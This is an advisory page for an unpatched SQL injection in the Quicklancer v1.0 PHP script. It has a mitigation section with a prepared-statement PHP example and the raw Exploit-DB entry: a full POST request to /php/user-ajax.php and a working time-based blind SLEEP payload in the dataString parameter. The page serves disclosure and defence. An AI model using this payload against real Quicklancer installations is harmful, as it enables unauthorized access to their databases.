Vendor: Quicklancer
By: Ahmet Ümit BAYRAM
CVSS: 9.8 (CRITICAL)
CWE: 89 (SQL Injection)
Product Name: Quicklancer
Affected Version From: Quicklancer v1.0
Affected Version To: Quicklancer v1.0
Patch Exists: NO
Related CWE:
CPE: a:codecanyon:quicklancer:1.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2023

Quicklancer v1.0 – SQL Injection

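Quicklancer v1.0 is vulnerable to SQL injection through the dataString POST parameter of /php/user-ajax.php (action=searchStateCountry), where the report below demonstrates a time-based blind injection. An attacker can exploit this to manipulate the application's SQL queries and gain unauthorized access to the database.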

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input before using it in SQL queries, or use prepared statements with parameterized queries so that input is never interpreted as SQL. Regular security audits and code reviews should also be conducted to identify and fix any other SQL injection vulnerabilities.
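
One way to apply the prepared-statement advice to the dataString parameter, as an added example (not Quicklancer's code and not part of the original report). The states table, its columns, the length limit and the function body are assumptions, and an in-memory SQLite database stands in for the application's MySQL database.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the application's database. The table and column
// names are assumptions; SQLite in memory keeps the example offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE states (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$pdo->exec("INSERT INTO states (name) VALUES ('Denemeli'), ('Ankara'), ('Izmir')");

// Vulnerable pattern, shown for contrast and never executed here: the value is
// spliced into the SQL text, so a quote in dataString ends the string literal
// and the rest of the input is parsed as SQL.
//   $sql = "SELECT id, name FROM states WHERE name LIKE '" . $_POST['dataString'] . "%'";

/**
 * Hypothetical hardened lookup for action=searchStateCountry.
 * The SQL text is fixed; dataString only ever travels as a bound value.
 */
function searchStateCountry(PDO $pdo, string $dataString): array
{
    $term = trim($dataString);
    if ($term === '' || strlen($term) > 100) {   // assumed length policy
        return [];
    }
    // Escape LIKE wildcards so "%" and "_" in the input match literally.
    // "!" is escaped first so the escapes added afterwards are not doubled.
    $like = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term) . '%';

    $stmt = $pdo->prepare(
        "SELECT id, name FROM states WHERE name LIKE :term ESCAPE '!' ORDER BY name LIMIT 20"
    );
    $stmt->bindValue(':term', $like, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A normal search term, then the payload from the report passed as dataString.
$payload = "deneme' AND (SELECT 8068 FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo";
foreach (['deneme', $payload] as $input) {
    $rows = searchStateCountry($pdo, $input);
    printf("%d row(s) for input of %d bytes\n", count($rows), strlen($input));
}
```

With PDO's MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so that the server, not the client library, performs the parameter binding.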

Exploit-DB raw data:

# Exploit Title: Quicklancer v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
# Demo Site: https://quicklancer.bylancer.com
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /php/user-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost
Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2; quickjob_view_counted=31; Quick_lang=arabic
Content-Length: 93
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

action=searchStateCountry&dataString=deneme


### Parameter & Payloads ###

Parameter: dataString (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068 FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo